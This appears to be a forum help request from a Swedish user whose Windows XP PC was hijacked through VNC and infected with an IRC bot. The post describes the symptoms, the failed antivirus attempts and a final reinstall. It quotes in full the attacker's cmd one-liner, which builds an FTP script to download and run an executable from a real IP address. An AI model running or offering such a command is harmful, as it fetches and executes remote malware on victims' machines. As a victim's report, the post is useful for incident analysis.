Win32.IRCBot.wo/oagain.exe/dragonage.exe, am I clean?

I read the "READ & RUN ME FIRST Before Asking for Support".

Don't know how much background info you guys need along with the log files so I include the details if you need them (and sorry if I don't get all the technical terms all right, I'm running my OS in Swedish and could have screwed up the translations). If all this is unnecessary, here's the condensed version: I got hacked via VNC and infected with some nasty shit that pretty much took over my cpu.

Longer version: Apparently I have caught some newer virus via my VNC. It started with the oagain.exe all of a sudden showing as just downloaded in the Firefox "Downloads" menu, along with an empty Firefox tab. The files origin was h*tp://www.w32-gen.us/ (changed a 't' to a '*' there, don't know if it's safe to go there, but it seemed to be some kind of cracking-site). I soon found out how this had happened, as "Run" popped up a couple of times during the evening with the file location pre-typed in, and immediately going off before I could do anything. As far as I know the file never ran itself though, which probably explains the multiple downloads.

I googled the file name and found some information on another message board. I followed the instructions there to prevent my cpu from contacting the w.32-site again (along with other sites), and thought I was safe. Although I had some problems when starting up my cpu (MSN, firefox etc wouldn't start running when I clicked on them) I didn't pay that much attention to it since it often worked if I just restarted the whole thing.

This Sunday the "Run"-window all of a sudden appeared with the file-destination pre-typed again, but whatever I had done to prevent my cpu from contacting that site apparently worked, and instead of the file downloading there was just a "Problem loading page"-message in a new Firefox-tab. However, the Command-window suddenly appeared and closed again (it happened too fast for me to see what it read) and then "Run" opened again. This time there was no text pre-written as before, instead I could see the text being typed in if it was me typing. I quickly pressed cancel* and then noticed the VNC-icon being active. I tried to close it down, but before I could move my mouse cursor to confirm, cancel was more or less auto-pressed. I tried again a couple of times with no success and finally used the arrow keys along with enter to make it go faster than whatever was controlling my cpu. When I had shut VNC down I quickly as hell uninstalled it, and thought I at least was safe for the moment.

*Here's what was typed before I canceled the action:
cmd /c echo OPEN 81.231.173.176 21200>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

I started running Adaware, but it didn't find anything. Spybot, Anti-Vir and Norton didn't even start at all. I did find (manually) "New.net Domains 7.22" which I uninstalled.

I also tried to go to the other message board to get some more information, but as soon as i clicked the link (from google) firefox shut down. I did find some other information though, and made a search for hijackthis. This time I didnt even get to the link from google, as firefiz immediately shut down as soon as the search was finished. Pretty soon I couldn't access internet at all.

I tried to go into the directory where the program was installed to start Norton from there, but as soon as I clicked the "Norton Internet Security"-directory the window shut down. I successfully uninstalled Spybot and Anti-vir with the intention of reinstalling them, however, Norton wouldn't uninstall, although it did disappear from the "Add/Remore programs"-menu.

Next thing I did was to install the F-Secure-software (antivirus/firewall) but the virus apparently took that one over as well as soon as it was installed

Finally, I rebooted in safe mode, reinstalled F-Secure and got it up and running and updated. I made a full scan (unfortunately no log attached since only the last scan seems to be saved, and I just did another one (bummer, attaching that one though)) and found some less serious crap, along with the "Win32.IRCBot.wo"-file that seems to be the real bad guy in this whole mess. After that I found my way to majorgeeks and started the process in the "READ & RUN ME FIRST Before Asking for Support"-section.

However, during the process, F-Secure found (and removed) "Win32.IRCBot.wo" one more time, and a similar virus a couple of times. There is also the "Dragonage.exe - Bioware - Unkown - Stopped" showing, checked, among the startup-files. So am I really clean?

I also wonder if there is some way to completely uninstall Norton. I cleaned out the directory manually since it wasn't in "Add/Remove" and didn't seem to feature an "Uninstall"-option elsewhere, but apparently it isn't all gone since I get some kind of error message from the program every now and then.

Sorry for the long post...

*more attachments coming*

 

More attachments.

The F-Secure-log wasn't in a text format, but apart from some trash in the Spybot-recovery-directory (and apart from the files found in earlier scans, which I can't find anywhere) this is the only interesting things:

Code:

Unscanned files:

    * Couldn't open C:\pagefile.sys
    * Couldn't open C:\WINDOWS\system32\drivers\dtscsi.sys
    * Couldn't open C:\WINDOWS\system32\drivers\sptd.sys
    * Couldn't open C:\WINDOWS\system32\config\default
    * Couldn't open C:\Documents and Settings\******\Local settings\Temp\hsperfdata_******\3920

This kind of worries me since it seems that those folders is where some other trash has been hidden as well.

 

I very much appreciate your help! However, I ended up reinstalling Windows XP completely instead, so I have to apologize for taking up your time. Even so, this website helped me tremendously with all its guides and information, thanks guys!

(Weird thing that happened just prior to the re-installation though: All of a sudden CPU went up to 100% and it seemed it was audio.exe taking up most of it. I tried to shut it down, but it came right back on again. I also tried to right-click on the icon in the bottom right and two options popped up, Volume control and one other, but none was clickable. Then when I held my mouse cursor over the icon there was a IP-nr. showing... WTF?? I pulled the plug and later reinstalled XP from scratch. It was also impossible to transfer files (I was trying to rescue the pics from our camera before reinstalling) to another cpu via cable, and with no burner installed I ended up using a 0.5 USB-memory for transfering 4GB of files, took me quite a while actually... )

Anyway, I have F-Secure installed now, but am thinking about switching to Zone Alarm + AVG because of the recommendations here. How much difference does it really make?

 

Ok, thank you very much for your help!